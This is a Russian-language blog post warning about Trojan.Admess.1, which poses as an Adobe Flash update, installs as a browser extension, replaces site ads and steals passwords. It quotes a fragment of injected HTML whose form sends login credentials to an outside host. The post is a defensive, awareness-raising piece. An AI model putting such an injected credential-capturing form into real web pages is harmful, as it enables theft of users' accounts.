Trojan.Admess.1, который подворовывает пароли и показывает навязчивую рекламу.

 Trojan.Admess.1, который подворовывает пароли и показывает навязчивую рекламу.
 Подхватить заразу можно  с помощью известной партнерской программы installmonster.ru. Может показаться, что вирусописатели обмельчали и занялись написанием кодов меняющих рекламные блоки на сайтах.
"Какая разница что там предлагают, доставка цветов по Москве или строительную технику в Ижевске, я всё равно не смотрю" -  говорят многие пользователи.

Отчасти это так. А если вместо цветов и подшипников Вам будут постоянно предлагать "взрослый контент"? Вам понравится?

Не забываем, реклама двигатель торговли. Из 100, человек 2-5 заинтересуются увиденным объявлением. Из 100 заинтересовавшихся, 2-8 купят услугу, товар и т.д. На чёрную или красную икру вирусописателю должно хватить. Притом, что у вируса присутствуют надстройки  для часто посещаемых ресурсов в том числе   odnoklassniki.ru, yandex.ru, mail.ru, youtube.com, zaycev.net.Не говоря уже, о vk.com , с его миллионной аудиторией.

Но рекламу, вирус заменяет на любых ресурсах, определяя рекламный код. Просто на указанных ресурсах, она выглядит более естественной, как будто, сам сервис её вставил.

Вирус относительно свежий, в феврале этого года, его уже определила антивирусная лабаратория Dr.Web и быстро добавила в свои базы.
Маскируется под популярный проигрыватель Adobe Flash. Методы его маскировки просты.

 Устанавливается, как надстройка к браузерам Google Chrome , Опере, Internet Explorer и Mozilla Firefox.

Пользователь уверен, что загружает обновление для Adobe Flash. На предупреждения антивируса, зачастую не реагирует — "обновление всё-таки". Вот и Trojan.Admess.1  уже у него. Также Trojan , замечен в воровстве паролей ( в частности на сайте odnoklassniki.ru). Продвинутые пользователи, могут заметить его код, если в опциях браузера выбрать "Веб разработка" далее "Исходный код страницы". Пример с odnoklassniki.ru. Он будет заметен как <form action = «http:// adobe-sdk.com/log/log_ok.php» method=»post» Далее, после двух строчек безобидного кода ввода, есть вот это : <input tupe=»hidden » name=»st.originalaction» value=»http://odnoklassniki. cmd=AnonimLogin&st.cmd=AnonimLogin» id=»field_originalaction»>

Подменяется форма ввода ЛОГИН — ПАРОЛЬ.

Сейчас многие антивирусные программы добавили его в свои базы, но одним из первых был Dr.Web. Бесплатные антивирусы  также среагировали быстро. Но бдительность терять не надо. Подумайте, прежде чем что либо устанавливать или разрешать.

А с чего бы это вдруг, на безобидное обновление в проигрывателе Adobe Flash, так злобно реагирует ваш антивирус? Но, если Вы сами "открываете двери" для Trojan-а, то антивирус ничего сделать не сможет.